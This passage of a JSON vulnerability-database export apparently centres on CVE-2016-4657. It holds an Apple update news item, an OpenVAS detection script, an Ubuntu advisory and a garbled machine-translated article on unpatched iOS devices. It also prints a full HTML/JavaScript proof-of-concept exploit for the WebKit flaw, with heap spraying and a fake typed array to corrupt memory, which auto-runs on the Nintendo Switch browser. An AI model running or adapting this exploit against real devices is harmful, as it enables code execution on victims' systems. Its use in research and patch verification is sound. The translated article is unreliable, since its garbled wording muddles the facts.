Group](<https://thehackernews.com/2016/08/apple-security-update.html>), which sells hacking exploits to governments like the UAE. \n \nUsers can install security patches for [Safari](<https://support.apple.com/en-us/HT207131>), [El Capitan, and Yosemite](<https://support.apple.com/en-us/HT207130>) via the usual software update mechanisms.\n", "modified": "2016-09-02T10:18:09", "published": "2016-09-01T23:15:00", "id": "THN:32ED4C0A7FA3A0F0A9A708FC243A644D", "href": "https://thehackernews.com/2016/09/apple-mac-os-x-update.html", "type": "thn", "title": "Update your Mac OS X \u2014 Apple has released Important Security Updates", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:37", "description": "\nNintendo Switch - WebKit Code Execution (PoC)", "edition": 1, "published": "2017-03-12T00:00:00", "title": "Nintendo Switch - WebKit Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4657"], "modified": "2017-03-12T00:00:00", "id": "EXPLOITPACK:6091475B7C3358E497093045025F72F1", "href": "", "sourceData": "<!doctype html>\n<html>\n <head>\n <title>CVE-2016-4657 Switch PoC</title>\n <style>\n body {font-size: 2em;}\n a {text-decoration: none; color: #000;}\n a:hover {color: #f00; font-weight: bold;}\n </style>\n </head>\n <body>\n <h1>CVE-2016-4657 Nintendo Switch PoC</h1>\n <ul>\n <li><a href=\\'javascript:go();\\'> go!</a></li>\n <li><a href=\\'javascript:document.location.reload();\\'> reload</a></li>\n </ul>\n <div id=\\'status\\'> waiting... click go.</div>\n\n <script>\n // display JS errors as alerts. Helps debugging.\n window.onerror = function(error, url, line) {\n alert(error+\\' URL:\\'+url+\\' L:\\'+line);\n };\n </script>\n <script>\n\n // based on jbme.qwertyoruiop.com\n // Thanks to:\n // + qwertyoruiop\n // + Retr0id\n // + Ando\n //\n // saelo\\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html\n\n // garbage collection stuff\n var pressure = new Array(100);\n // do garbage collect\n dgc = function() {\n for (var i = 0; i < pressure.length; i++) {\n pressure[i] = new Uint32Array(0x10000);\n }\n for (var i = 0; i < pressure.length; i++) {\n pressure[i] = 0;\n }\n }\n\n\n // access to the overlapping Uint32Array\n var bufs = new Array(0x1000);\n // we will modify the vector of this\n var smash = new Uint32Array(0x10);\n // the array with the stale pointer\n var stale = 0;\n\n var _dview = null;\n // write 2x 32bit in a DataView and get the Float representation of it\n function u2d(low, hi) {\n if (!_dview) _dview = new DataView(new ArrayBuffer(16));\n _dview.setUint32(0, hi);\n _dview.setUint32(4, low);\n return _dview.getFloat64(0);\n }\n\n function go_() {\n // check if the length of the array smash changed already. if yes, bail out.\n if (smash.length != 0x10) return;\n\n // garbage collect\n dgc();\n\n // new array with 0x100 elements\n var arr = new Array(0x100);\n\n // new array buffer of length 0x1000\n var yolo = new ArrayBuffer(0x1000);\n\n // populate the arr with pointer to yolo and a number. not quite sure why.\n arr[0] = yolo;\n arr[1] = 0x13371337;\n\n // create an object whos toString function returns number 10 and messes with arr.\n var not_number = {};\n not_number.toString = function() {\n arr = null;\n props[\\\"stale\\\"][\\\"value\\\"] = null;\n\n // if bufs is already overlapping memory, bail out.\n if (bufs[0]) return 10;\n // really make sure garbage is collected\n // the array pointed at by arr should be gone now.\n for (var i = 0; i < 20; i++) {\n dgc();\n }\n // for the whole buf Array\n for (i = 0; i < bufs.length; i++) {\n // fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier\n bufs[i] = new Uint32Array(0x100 * 2)\n // for each element of that array\n for (k = 0; k < bufs[i].length;) {\n // set memory to 0x41414141 0xffff0000\n // basically spraying the JSValue 0xffff000041414141\n // which is the Integer 0x41414141\n // phrack: Integer FFFF:0000:IIII:IIII\n bufs[i][k++] = 0x41414141;\n bufs[i][k++] = 0xffff0000;\n }\n }\n return 10;\n };\n // define a new object with some properties\n var props = {\n p0: { value: 0 },\n p1: { value: 1 },\n p2: { value: 2 },\n p3: { value: 3 },\n p4: { value: 4 },\n p5: { value: 5 },\n p6: { value: 6 },\n p7: { value: 7 },\n p8: { value: 8 },\n // the length of this object is set to this object that does evil stuff with toString()\n length: { value: not_number },\n // the reference to the arr array. Which will later be freed.\n stale: { value: arr },\n after: { value: 666 }\n };\n // define a new target array\n var target = [];\n\n // TRIGGER BUG!\n // set the properties of the target based on the previously defined ones\n Object.defineProperties(target, props);\n\n // get a reference to the target stale property, which points to arr\n stale = target.stale;\n\n // make sure that the stale[0] points actually to the 0x41414141 data if not, we don\\'t wanna mess with it and try again\n if(stale[0]==0x41414141) {\n // stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242\n stale[0] += 0x101;\n //stale[0] = 0x41414242;\n //document.getElementById(\\'status\\').innerText = \\'bug done.\\';\n // searching the whole memory that is overlaying the old arr. Looking for 0x41414242\n for (i = 0; i < bufs.length; i++) {\n for (k = 0; k < bufs[0].length; k++) {\n // Found the value! bufs[i][k] point now at the same memory as stale[0]\n if (bufs[i][k] == 0x41414242) {\n alert(\\'Overlapping Arrays found at bufs[\\'+i+\\'][\\'+k+\\']\\\\nsmash.length is still: 0x\\'+smash.length.toString(16));\n\n // create a new object. Will look kinda like this:\n // 0x0100150000000136 0x0000000000000000 <- fictional value\n // 0x0000000000000064 0x0000000000000000 <- [\\'a\\'],[\\'b\\']\n // 0x???????????????? 0x0000000000000100 <- [\\'c\\'],[\\'d\\']\n stale[0] = {\n \\'a\\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array\n \\'b\\': u2d(0, 0),\n \\'c\\': smash, // var pointing at the struct of a Uint32Array(0x10)\n \\'d\\': u2d(0x100, 0)\n }\n\n alert(\\'created the JSObject.\\\\nstale[0] = \\'+stale[0]);\n\n // remember the original stale pointer, pointing at the object with the a,b,c,d properties\n stale[1] = stale[0];\n\n // now add 0x10 to the pointer of stale[0], which points now in the middle of the object.\n bufs[i][k] += 0x10;\n // check the type of stale[0].\n\n // removed the loop because it makes the exploit sooooooo unreliable\n // based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)\n /*while(!(stale[0] instanceof Uint32Array)) {\n // if stale[0] is not a Uint32Array yet, increment the structureID guess\n structureID++;\n\n // assign the next structureID to the original object still referenced by stale[1]\n stale[1][\\'a\\'] = u2d(structureID, 0);\n }*/\n\n // Give some information. stale[0] should now be a Uint32Array\n alert(\\'misaligned the pointer to the JSObject.\\\\nstale[0] = \\'+stale[0]+\\'\\');\n\n // write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array\n // which should point to the struct of smash, allowing us to overwrite the length of smash\n stale[0][6] = 0x1337;\n\n // check the length of smash is now.\n alert(\\'smash.length is now: 0x\\'+smash.length.toString(16));\n\n alert(\\'done!\\\\nswitch will probably crash now :O\\');\n return;\n }\n }\n }\n }\n document.getElementById(\\'status\\').innerText = \\' fail. refresh the page and try again...\\';\n setTimeout(function() {document.location.reload();}, 1000);\n }\n\n function go() {\n document.getElementById(\\'status\\').innerText = \\' go! \\';\n dgc();\n dgc();\n dgc();\n dgc();\n dgc();\n dgc();\n setTimeout(go_, 500);\n }\n\n // if Switch browser is detected, auto start exploit\n if(navigator.userAgent.indexOf(\\'Nintendo Switch\\')>-1) {\n document.getElementById(\\'status\\').innerText = \\'Found Nintendo Switch! \\';\n setTimeout(go, 2000);\n }\n </script>\n </body>\n</html>", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-09-13T19:14:28", "bulletinFamily": "info", "cvelist": ["CVE-2017-2370", "CVE-2016-4655", "CVE-2017-7047", "CVE-2017-6975"], "edition": 1, "description": "the iOS system has always been to its good safety deep to give a large user of trust, in particular its security into the level rate with Android than there is a significant upper hand. But according to baidu security Labs hundreds of millions of the Taiwan Strait within the iOS equipment system version statistical invention, the iOS 10.3.3 to 7.19 announced it has been 50 days, only 54% of the user into the class to latest iOS 10.3.3 system, the residual remaining to the almost binary home iOS equipment is still stuck in the high-risk flaws vulnerabilities bugs affecting the legacy system. Even the latest iPhone7 series models, there are also nearly 32% of the equipment is not in real time into the stage. And these older versions of the more high-risk flaws vulnerability bug using way to ever is underground, not into the users face stringent security hazard. Let's shout to iOS users as soon as possible into the class, and also the cry of mobile phone manufacturers to adopt the more useful tips to cover popular users and prevent them from being a known high-risk flaws vulnerability bug of intimidating.\n\nNearly binary at home and iOS users face a high-risk flaws vulnerabilities bugs are intimidated\n\nSecurity lab for collecting on the million units iOS equipment system version to stop the statistics, to dispel the hypocrisy of the equipment nuisance after the results show, the Today domestic feed grade to the latest iOS 10.3. 3 system equipment accounted for only 54 per cent. There are still nearly half of iOS equipment to evacuate the residence in the other 44 differences of the old version of the iOS system. Those running older versions of iOS system of the equipment will face in the foregoing enumeration of the various high-risk flaws vulnerability bug security risk.\n\nDetailed system version of a ratio spread as shown in Figure 1, From left half-sector beginning in the counterclockwise biased by the old and new versions ORDER BY for latest iOS 10.3. 3 to 4 years ago the version of iOS 7 in. This, the latest iOS 10.3. 3 System accounted for 53. 6%; iOS 10 older versions of important to 10. 3. 2 for than 8. 2% and 10.2.1 for more than 6. 2 percent based, 10. 2 and 10. 1. 1 Each accounted for 3%, of residue remaining 7 iOS 10 The Legacy of the public accounted for 6. 9%; still with spans 18% of the users stay in iOS 10 the previous version, announced once in two years of iOS 9 accounted for 11. 9%, declared once three years of iOS 8 accounted for 6 per cent.\n\nAnything else, let's get to the important models of the category system version of the scale to stop the statistics, the results shown in Figure 2, From left to right, respectively, for the iPhone7 series 2016 year 9 month announced that iPhone6s series in 2015 9 January announced, the older iPhone models, iPad Pro Series and other iPad series. Class 5 equipment models are bound to the proportion of fragmented score, that is now the latest iPhone7 series phones, there are also nearly 32%did not feed grade to the latest 10. 3. 3 System.\n\nHome and iOS equipment system version of the spread\n\nFigure 1. Home and iOS equipment system version of the spread\n\nThe differences of the machine type category system version of the spread\n\nFigure 2. The differences of the machine type category system version of the spread\n\nMultiple high risk flaws vulnerability bug use is Underground, the impact of iOS10. 3. 3 previous all version\n\nEach iOS system announced a new version after the new version has fix the sector flaws vulnerability bug details and the use way will be the workshop's ground floor, sector flaws vulnerability bug using the complete code will also be underground announced for discussion exchange. For the safety of the community made into the offer, but also for vicious thoughts attacking the invaders supply a convenient attack invasion premise. Vicious thoughts to attack the intruder might be able to from the underground channels to get coherent use of the code, joint sector Webkit flaws vulnerability bug use, and can be achieved from the click on the link to get Kernel permissions of the complete attack invasion. If the user no real-time update to the latest version of the iOS system, will face stringent security intimidating.\n\nTable 1. Sector has been underground complete use of the Code of the common flaws vulnerability bug using statistical \n\nSector has been underground complete use of the Code of the common flaws vulnerability bug using statistical\n\nTable 1 enumerates the sectors with a Grand persecution of iOS flaws vulnerability bug:\n\n\u25cf Triple Fetch flaws vulnerability bug\uff08CVE-2017-7047: the impact 10. 3. 2 and the previous iOS system, via the process of attack-invasion user-state XPC communication deserialization mechanisms of disadvantage, in order to achieve today the privileged user mode processes such as launchd, the coreauthd such as the random rate of the code to fulfill. Complete flaws exploits bug exploit code had been underground.\n\n\u25cf ziVA series of kernel flaws vulnerability bug: affects 10. 3. 1 and the previous iOS system, via the process of attack-invasion core AppleAVEDriver of the logical shortcomings and thus give the Kernel permission. The attack invasion can be multiplexed above the Triple Fetch flaws vulnerability bug achieve post-sandbox escape, replete with flaws exploit the bug using the code once in a github underground.\n\n\u25cf BroadPwn Wi-Fi flaws vulnerability bug\uff08CVE-2017-6975: the impact 10. 3 and the previous iOS system, iOS equipment on the Broadcom Wi-Fi chip firmware contain a buffer overflow flaws vulnerabilities bugs. Attack the intruders can be via the process of collecting the indirect attack invasion Unified Wi-Fi hot under there flaws vulnerability bug of iOS equipment, where the victim does not perceive the environment in the other equipment on the operation of the vicious thoughts code.\n\n\u25cf mach_voucher kernel flaws vulnerability bug\uff08CVE-2017-2370: the impact 10. 2 and the previous iOS system, via the process of attack-invasion iOS 10 The newly introduced mach trap of the disadvantages to get a kernel space of the arbitrary whims of the reader. Extensive use of the code once Underground, the flaws vulnerability bug is also for the yalu 10.2 escaped object. \niOS into the class and flaws vulnerability bug fix strategy\n\nIn the iOS system for the user to supply more[security](<http://www.myhack58.com/Article/60/Article_060_1.htm>)with privacy screening strategy at the same time, for the iOS system flaws vulnerability bug also occurs year to year decline trend. Because the iOS system is also no hot fix effect, the user only via the process system into has a way to dispel the flaws vulnerability bug intimidating. In the snapped past year, Apple continuously announced 12 iOS version today the version number is 10. 3. 3 update, the total repair 338 security flaws vulnerabilities bugs, including 30 kernel flaws vulnerability bug, 106 the Webkit code to fulfil flaws vulnerability bug in this more high-risk flaws vulnerability bug complete use of the code once underground, you can indirectly give the system the highest authority, major intimidate the user security.\n\nFrom 2016 year 9 month announced so far, iOS 10 system every 2 months once a small version into the class, each time the feed has a uniform repair singular ten high-risk security flaws vulnerability bug. Attack the intruder is able to through process of clicking on the link, visit the vicious thoughts-do line collection, device utilization, etc. approach to the architecture of the proposed attack invasion, the use of these high-risk flaws vulnerability bug to give the system the highest authority, and then reaches to steal the user sensitive information, long-distance monitoring, directional attack invasion.\n\nApple \u5f00\u8f9f\u8005 website performance, 2016 9 December, announced today, universal range of 87%of iOS users have into the class to iOS 10, but did not give a detailed version of the spread to the environment. But as mentioned before, the small version of the update is not real-time will still form a strict security intimidating.\n\nTable 2. iOS 10 The version of the announced time, fix the flaws the vulnerability bug number statistics\n\niOS 10 The version of the announced time, fix the flaws the vulnerability bug number statistics\n\nTable 2 enumeration containing the security update for the iOS version, announced time, distance, number of days and fix flaws vulnerability bug of the total number of Statistics Environment Statistics is removed iOS10 in three 10.0.2, to 10.0.3, to 10.1.1 no security updates to the version.\n\nFrom the table of the disk calculated, the practice environment under uniform every 46 days the iOS system will stop once the system updates, each update uniform repair flaws vulnerability bug34. In some special circumstances, Apple will also decide in a shorter period announced the update, it is urgent to fix individual high-risk flaws vulnerability bug. For example, in order to repair sector iPhone 7/7Plus pre-installed iOS 10 system in the high-risk flaws vulnerability bug, preferably in the in the announced iOS10 Unity Day announced iOS 10.0.1, the\u201cTrident\u201diOS APT attacks invasion in the kernel information revealed flaws vulnerability bug(CVE-2016-4655)to stop the repair; at the Project Zero officially awarded the blog of the underground flaws vulnerability bug details the day before the announced iOS 10.3.1 repair Qualcomm Wi-Fi chip feel free to rate code to fulfil flaws vulnerability bug\uff08CVE-2017-6975 km.\n\n**[1] [[2]](<89257_2.htm>) [[3]](<89257_3.htm>) [[4]](<89257_4.htm>) [next](<89257_2.htm>)**\n", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "MYHACK58:62201789257", "href": "http://www.myhack58.com/Article/html/3/62/2017/89257.htm", "title": "Nearly half of Apple iOS users not to upgrade to the latest version easily by a known high-risk flaws vulnerability bug violations-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4762", "CVE-2016-4767", "CVE-2016-4734", "CVE-2016-4761", "CVE-2016-4759", "CVE-2016-4733", "CVE-2016-7578", "CVE-2016-4769", "CVE-2016-4768", "CVE-2016-4728", "CVE-2016-4613", "CVE-2016-4707", "CVE-2016-4764", "CVE-2016-4735", "CVE-2016-4760", "CVE-2016-4657", "CVE-2016-4666", "CVE-2016-4765"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-01-11T00:00:00", "id": "OPENVAS:1361412562310843008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843008", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3166-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for webkit2gtk USN-3166-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843008\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-11 05:38:31 +0100 (Wed, 11 Jan 2017)\");\n script_cve_id(\"CVE-2016-4613\", \"CVE-2016-4657\", \"CVE-2016-4666\", \"CVE-2016-4707\",\n\t\t\"CVE-2016-4728\", \"CVE-2016-4733\", \"CVE-2016-4734\", \"CVE-2016-4735\",\n\t\t\"CVE-2016-4759\", \"CVE-2016-4760\", \"CVE-2016-4761\", \"CVE-2016-4762\",\n\t\t\"CVE-2016-4764\", \"CVE-2016-4765\", \"CVE-2016-4767\", \"CVE-2016-4768\",\n\t\t\"CVE-2016-4769\", \"CVE-2016-7578\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3166-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3166-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3166-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.14.2-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.14.2-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:30", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4762", "CVE-2016-4767", "CVE-2016-4734", "CVE-2016-4761", "CVE-2016-4759", "CVE-2016-4733", "CVE-2016-7578", "CVE-2016-4769", "CVE-2016-4768", "CVE-2016-4728", "CVE-2016-4613", "CVE-2016-4707", "CVE-2016-4764", "CVE-2016-4735", "CVE-2016-4760", "CVE-2016-4657", "CVE-2016-4666", "CVE-2016-4765"], "description": "A large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.", "edition": 5, "modified": "2017-01-10T00:00:00", "published": "2017-01-10T00:00:00", "id": "USN-3166-1", "href": "https://ubuntu.com/security/notices/USN-3166-1", "title": "WebKitGTK+ vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}